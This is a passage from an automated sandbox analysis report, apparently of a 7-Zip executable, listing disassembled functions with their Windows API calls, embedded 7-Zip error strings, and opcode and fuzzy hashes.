                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                              • Instruction ID: 93b9ca456351708ab7cfd464cfecf39af4ac2901ebd7c6a5c896d7be7797d982
                                              • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                              • Instruction Fuzzy Hash: B221367370424096C728DE1AB80069B6294F345BA9F20D22AFE6E47784EB7CC942D748
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                              • Instruction ID: dbb0aa97f46b7bacba67bf45b2bea6526e8ba5343517b826ffcf3bbf1c635250
                                              • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                              • Instruction Fuzzy Hash: 9C112BE27157508FCB308B6CA4D0229A250B700787F54403BDECA87B17DA6DCCDED24A
                                              APIs
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741B9
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741C5
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741D1
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741DD
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741E6
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741EF
                                                • Part of subcall function 0047419C: free.MSVCRT ref: 004741F8
                                              • free.MSVCRT ref: 00483F45
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                              • Instruction ID: 113a86774b4e5bd61ccaf55cd3e3286bf97c872b008574c11b2065ccf70f5a71
                                              • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                              • Instruction Fuzzy Hash: 94014C73A21790CACB21AF1DC18116DBB24F759FE8368911BEB4907764E736C883C7A5
                                              APIs
                                              • free.MSVCRT(?,?,?,?,?,?,0045FF0B), ref: 004586A9
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                              • Instruction ID: 22e58b31acbaa96f6560512bc85c7b817409e95fd0467e14a4f563020a89e6ba
                                              • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                              • Instruction Fuzzy Hash: E8014B7631664086E710CF15D56C35E3BA0A7D5B69F140209DBA84B3D2CBBEC54ECB98
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                              • Instruction ID: 71460cb0d3478c9f4d00a4fda4d7b52fc3677cbefd55cf6a9759003cb5a451f9
                                              • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                              • Instruction Fuzzy Hash: 42F0EC623102494BCB00DF79A9C22692161FB44796F90143BDF4587707D92CDCDD8719
                                              APIs
                                                • Part of subcall function 004589D8: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 004589EA
                                              • GetLastError.KERNEL32 ref: 0045CB49
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ChangeCloseErrorFindLastNotification
                                              • String ID:
                                              • API String ID: 1687624791-0
                                              • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                              • Instruction ID: 8980b8bec4ee1fe428e2e7a3cd86b9762feda914c2be4d4a492efadac4ed975d
                                              • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                              • Instruction Fuzzy Hash: 77D02B80B501808ADB105AF968C23350081A718703F90143BDE5BC6303E81C9CCDA22E
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: memmove
                                              • String ID:
                                              • API String ID: 2162964266-0
                                              • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                              • Instruction ID: 524af607b1a0e3f62397f9e4474cbc591ff1afe37f6b04567f3f15a2228c1791
                                              • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                              • Instruction Fuzzy Hash: 09D05EA7B506C886CA049B2BD78151DA3229B89FD9708D1299F080B70ACE24C8E58744
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                              • Instruction ID: 50191db05e657e803bc91581a6683bb10e82b40b975a10ab64e04c6a0614f43b
                                              • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                              • Instruction Fuzzy Hash: 0BC0800178234505C509215B1FC732C01010F8E7D7E4C40215E4407B53D95C48E94B04
                                              APIs
                                                • Part of subcall function 00453314: memmove.MSVCRT ref: 00453339
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,00000000,004604E1), ref: 0045F201
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,00000000,004604E1), ref: 0045F23D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                              • API String ID: 1534225298-798110030
                                              • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                              • Instruction ID: 1745f5cf069d4810c0ad756c4c72bc848ededf83d3e371ed2455b5c2e8e5da8e
                                              • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                              • Instruction Fuzzy Hash: 9CC14B72215A4086CA10EF12E89175FB760F7D6B95F540137EA8A43B2ADF7CC84ECB49
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                              • Instruction ID: 0a5b9c63994ca8b6dc8022ffea6bf3fa5a68ce5dcaf58549d199b9130036593c
                                              • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                              • Instruction Fuzzy Hash: D0D14A76209AC585CA20EF22E5606AF6760F7C6B89F015547DF9E53B26CF7CC849CB08
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free$memset$strlen$memmove
                                              • String ID: data:
                                              • API String ID: 527563900-3222861102
                                              • Opcode ID: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                              • Instruction ID: 6d44409c3cf88aacb64d3ab8fd320534d4b52e9326ebf0bba8bc86677a25f101
                                              • Opcode Fuzzy Hash: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                              • Instruction Fuzzy Hash: 4802156220468197DF20DF26E4803AF7B61F396789F445027EF4A47B5ADB7CC94AC748
                                              APIs
                                              • memset.MSVCRT ref: 0048FAAC
                                              • free.MSVCRT ref: 0048FAC0
                                              • free.MSVCRT ref: 0048FC43
                                                • Part of subcall function 00452130: malloc.MSVCRT(?,?,?,?,00452FDA,?,?,00000000,00000000,0045329F), ref: 00452134
                                                • Part of subcall function 00452130: _CxxThrowException.MSVCRT ref: 0045214F
                                                • Part of subcall function 0048F820: _CxxThrowException.MSVCRT ref: 0048F88D
                                              • free.MSVCRT ref: 00490031
                                                • Part of subcall function 0048F8B8: memmove.MSVCRT ref: 0048F91E
                                                • Part of subcall function 0048F8B8: free.MSVCRT ref: 0048F926
                                                • Part of subcall function 0048F93C: memmove.MSVCRT ref: 0048F992
                                                • Part of subcall function 0048F93C: free.MSVCRT ref: 0048F99A
                                              • free.MSVCRT ref: 004900EA
                                              • free.MSVCRT ref: 004900F2
                                              • free.MSVCRT ref: 00490101
                                              • free.MSVCRT ref: 0049010A
                                              • free.MSVCRT ref: 00490113
                                              • free.MSVCRT ref: 00490121
                                              • _CxxThrowException.MSVCRT ref: 00490184
                                              Strings
                                              • Duplicate filename in archive:, xrefs: 00490149
                                              • Internal file name collision (file on disk, file in archive):, xrefs: 0049015D
                                              • Duplicate filename on disk:, xrefs: 0048FCB4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrow$memmove$mallocmemset
                                              • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                              • API String ID: 3338823681-819937569
                                              • Opcode ID: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
                                              • Instruction ID: 5b91c4f616a7db7e922d74790e5b11bbd4af42b1add01606cbf5ee403151d1ff
                                              • Opcode Fuzzy Hash: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
                                              • Instruction Fuzzy Hash: DE12A27321868486CB20EF16E44065EB7A1F389B94F504A27EF9A47B19DF3CD895CF08
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1de10b3c9db1c438cb2868e4062a9709d6c79681b265985f1a4863e49c1adaa6
                                              • Instruction ID: 32ad8371d3bb225eb0b77bfb9c3dc7eb72392313d3000f0800601a610019418a
                                              • Opcode Fuzzy Hash: 1de10b3c9db1c438cb2868e4062a9709d6c79681b265985f1a4863e49c1adaa6
                                              • Instruction Fuzzy Hash: F0024D72309B8192DA20DF16E4903AEA361F785B84F544127DB8E97B25EF7CC885CB46
                                              APIs
                                              • DeviceIoControl.KERNEL32 ref: 00458F7A
                                              • DeviceIoControl.KERNEL32 ref: 0045905E
                                              • DeviceIoControl.KERNEL32 ref: 004590B5
                                              • DeviceIoControl.KERNEL32 ref: 004590F6
                                                • Part of subcall function 0045ABB0: GetModuleHandleW.KERNEL32 ref: 0045ABD1
                                                • Part of subcall function 0045ABB0: GetProcAddress.KERNEL32 ref: 0045ABE1
                                                • Part of subcall function 0045ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0045AC32
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                              • String ID: ($:
                                              • API String ID: 4250411929-4277925470
                                              • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                              • Instruction ID: 7c94986c53dc9a303ca46ba88c766998bb5d6c82e2d15e6d17bd7fb46d8ec5ae
                                              • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                              • Instruction Fuzzy Hash: 4851BD32608BC1D6DB20DF20F45079EB765F384754F548526DB8A47B59EB3CC8A8CB48
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$DriveLogicalStrings
                                              • String ID:
                                              • API String ID: 837055893-0
                                              • Opcode ID: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
                                              • Instruction ID: 7cfe6afe492eb5cad0bd664bc2a1a293b66a61fe0e6b28ffffd6578fc0e5de70
                                              • Opcode Fuzzy Hash: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
                                              • Instruction Fuzzy Hash: E231D563301A4145DA30EF23A95136F6251AB86BEAF48423B9E5E57786DF3CC84EC308
                                              APIs
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 004596D1
                                              • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00459723
                                              • DeviceIoControl.KERNEL32 ref: 0045976C
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00459779
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00459796
                                              • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 004597C4
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 004597CD
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ControlDeviceFileHandleInformationmemmove
                                              • String ID:
                                              • API String ID: 2572579059-0
                                              • Opcode ID: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
                                              • Instruction ID: 747982359a85061867e303fd8ef21d4c7e4ec0075ee72e9ab7b764f9b8908720
                                              • Opcode Fuzzy Hash: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
                                              • Instruction Fuzzy Hash: 4C31A632215E40C5CA309F12F95136BB364E386BE5F584227EFE947B96DE3DC8998708
                                              APIs
                                              • FileTimeToLocalFileTime.KERNEL32 ref: 0045B12A
                                              • FileTimeToSystemTime.KERNEL32 ref: 0045B13E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: Time$File$LocalSystem
                                              • String ID: gfff
                                              • API String ID: 1748579591-1553575800
                                              • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                              • Instruction ID: 706f744adc472fc0540e294dea7e562e2cc1ae9637da25f83394b5be94981191
                                              • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                              • Instruction Fuzzy Hash: 6D518893B042C04BD7198B3DD846BCDAFC1E3A5758F08822ADF95C7786E26DC50AC761
                                              APIs
                                                • Part of subcall function 0045B5B8: GetCurrentProcess.KERNEL32 ref: 0045B5C2
                                              • GetSystemInfo.KERNEL32 ref: 0045B624
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CurrentInfoProcessSystem
                                              • String ID:
                                              • API String ID: 1098911721-0
                                              • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                              • Instruction ID: a12c93a76da4d0c8967f19a82765485e5c9a9aed581fcd70f7212f66d241975d
                                              • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                              • Instruction Fuzzy Hash: 10E0926662489483CB30DB08D44266AA360F394746FC05222EA8A82F16DF2DC61CCF49
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                              • Instruction ID: 34afeae6880bda907862fecc5a575742f80bca13212b8b6d580c827bd778b7ad
                                              • Opcode Fuzzy Hash: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                              • Instruction Fuzzy Hash: 09C001FA2197408B874A8F2EA850818BBA0F788B907868029AA0CD3300E2358444CF24
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                              • Instruction ID: bc56c21b3891befcb217b043a85d4c615f4ae6145c06e570f67b0e466c9ca687
                                              • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                              • Instruction Fuzzy Hash: 82D1902335698181CA50EF26E55166FA720F7C3789F505157AF8E93B2BDE6CC84ACF08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
